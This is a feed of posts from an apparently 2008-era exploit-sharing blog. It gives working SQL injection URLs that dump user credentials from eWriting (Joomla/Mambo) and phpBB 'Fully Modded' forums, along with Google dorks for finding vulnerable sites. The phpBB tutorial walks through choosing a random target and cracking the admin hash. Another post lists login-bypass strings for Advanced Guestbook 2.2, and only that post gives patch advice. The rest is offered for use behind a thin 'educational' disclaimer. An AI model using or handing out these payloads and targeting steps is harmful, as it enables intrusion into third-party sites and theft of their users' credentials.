tag:blogger.com,1999:blog-85349931142943063312011-04-21T13:39:44.313-07:00On Xpl0r3d You Can Discuss About: zero day exploits Security, Exploits And Vulnerabilities Share Your Latest, 0day Exploits, vulnerabilities here. The Information Provided On This Blog Is For Educational Purpose Only.Ca$hhttp://www.blogger.com/profile/17138069467812416226noreply@blogger.comBlogger41100tag:blogger.com,1999:blog-8534993114294306331.post-2184050266601618062008-03-16T06:24:00.000-07:002008-03-16T06:26:36.996-07:00eWriting 1.2.1 - SQL injection<br /><br /><br />Dorks:<br /><br />"Powered by eWriting 1.2.1<br />allinurl:"com_ewriting"<br /><br />Joomla!<br />/index.php?option=com_ewriting&amp;Itemid=9999&amp;func=sel ectcat&amp;cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--<br /><br />Mambo<br />/index.php?option=com_ewriting&amp;Itemid=9999&amp;func=sel ectcat&amp;cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--<br /><br />All credit goes to the original author<br /><br />Source: http://hacking.isgreat.org/community/showthread.php?t=1015<br /><br />Note: This is for educational purposes only, don't cause harm to anyone using this exploit<br /><br />Enjoy!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8534993114294306331-218405026660161806?l=xpl0r3d.blogspot.com' alt='' /></div>Ca$hhttp://www.blogger.com/profile/17138069467812416226noreply@blogger.com0tag:blogger.com,1999:blog-8534993114294306331.post-9070810692831016432008-03-15T12:32:00.000-07:002008-03-15T12:37:12.471-07:00Phpbb hacking with pictures<br />I already posted a step by step video for this hack<br />the video is located @ <a href="http://rapidshare.com/files/99460220/phpbb-Sql-Injection.rar.html" target="_blank">[quote]http://rapidshare.com/files/99460220/phpbb-Sql-Injection.rar.html[/quote]</a><br />Well get back to work <img src="http://hacking.isgreat.org/community/images/smilies/smile.gif" alt="" title="Smile" smilieid="1" class="inlineimg" border="0" /><br />What we need for this hack to work:<br />1: A pc with internet connection<br />2: our friend (Google)<br />3: The sql injection code<br />4. And finally the target.<br /><br />lets do it step by step:<br /><br />open up google and type "Modified by Fully Modded" in search bar.<br />it will give many results, select any one randomly.<br /><br />this is what you most likely be getting after you search for the above string.<br /><img src="http://img372.imageshack.us/img372/2172/51620933go2.jpg" alt="" border="0" /><br /><br />Just have a look at the target<br /><br />now we have the target, its time to inject our target now:<br />for injection we use the following string :<br /><br />[code]http://site.com/forum/kb.php?mode=article&amp;k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&amp;page_num=2&amp;cat=1[/code]Now from the above string [replace the site.com/forum/] with you target site and forum path <img src="http://hacking.isgreat.org/community/images/smilies/smile.gif" alt="" title="Smile" smilieid="1" class="inlineimg" border="0" /><br /><br />Hit enter and wait for the page to load fully<br /><br /><img src="http://img219.imageshack.us/img219/9457/38138541go3.jpg" alt="" border="0" /><br /><br />Well this sql injection will give you the admins username along with the hash<br />now you need to break the hash in order to login as admin <img src="http://hacking.isgreat.org/community/images/smilies/smile.gif" alt="" title="Smile" smilieid="1" class="inlineimg" border="0" /><br /><br />To break the hash use<br /><a href="http://www.milw0rm.com/cracker/insert.php" target="_blank">http://www.milw0rm.com/cracker/insert.php</a><br /><br />enter the hash their and click on submit and it will give you the password <img src="http://hacking.isgreat.org/community/images/smilies/smile.gif" alt="" title="Smile" smilieid="1" class="inlineimg" border="0" /><br /><br />All credit goes to the original author<br /><br />Source: http://hacking.isgreat.org/community/showthread.php?t=1015<br /><br />Note: This is for educational purposes only, don't cause harm to anyone using this exploit<br /><br />Enjoy!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8534993114294306331-907081069283101643?l=xpl0r3d.blogspot.com' alt='' /></div>Ca$hhttp://www.blogger.com/profile/17138069467812416226noreply@blogger.com0tag:blogger.com,1999:blog-8534993114294306331.post-20717651550112781012008-02-08T03:56:00.000-08:002008-02-08T04:15:48.124-08:00its not a new vulnerability in "advanced guestbook"<br />but i am posting it here because still no patch is issued for fixing it.<br /><br />as per bugtraq,<br />It has been reported that Advanced Guestbook is prone to a SQL injection vulnerability that could allow an attacker to gain administrative access to the application.<br /><br />This issue is reported to exist in Advanced Guestbook 2.2, however, it is possible that other versions are affected as well.<br /><br />The following proof of concept exploits have been provided:<br /><br />JQ <idiosyncrasie@xs4all.nl> explains that it is possible to trigger this issue by leaving the username entry blank and entering the following string in the password field:<br /><br />') OR ('a' = 'a<br /><br />Spy Hat <spyhat@spyhat.com> comments that it is also possible to leverage this issue by leaving the password field blank and entering the following string into the username field:<br /><br />? or 1=1 --<br /><br /><span style="font-size:78%;">For laymen:<br /><br /><span style="font-size:100%;">in simple terms,<br /></span></span>Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access.<br />proof of concept can be found by googling for "intitle:guestbook "advanced guestbook 2.2 powered""<br /><br />this google query shows results for websites with "Advanced Guestbook v2.2" installed an attacker can select any of the results, and use this sql injection to gain unauthorized access.<br /><br />it is strongly recommended to change the name/location of www.example.com/guestbook/admin.php"<br />also, This vulnerability is reportedly fixed in version 2.3.1.<br />update your version immediately if you are still running the old version.<br /><br /></spyhat@spyhat.com></idiosyncrasie@xs4all.nl><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8534993114294306331-2071765155011278101?l=xpl0r3d.blogspot.com' alt='' /></div>Ca$hhttp://www.blogger.com/profile/17138069467812416226noreply@blogger.com0tag:blogger.com,1999:blog-8534993114294306331.post-77938925235576341592008-02-08T03:27:00.000-08:002008-02-08T03:42:56.441-08:00<span style="font-size:78%;">Hi,</span><br /><br />This is my first post on "Latest Exploits and Vulnerabilities"<br />I named this blog while keeping in mind the meaning of the words used.<br />I will try to update this blog with the latest exploits and vulnerabilities.<br /><br />If you like the content of this blog, you can also visit my website located at:<br /><br /><a href="http://hacking.isgreat.org/"><span style="font-weight: bold; font-style: italic; color: rgb(255, 102, 102);">http://hacking.isgreat.org</span></a><br /><br /><span style="font-size:85%;">Thank you for visiting this blog.</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8534993114294306331-7793892523557634159?l=xpl0r3d.blogspot.com' alt='' /></div>Ca$hhttp://www.blogger.com/profile/17138069467812416226noreply@blogger.com0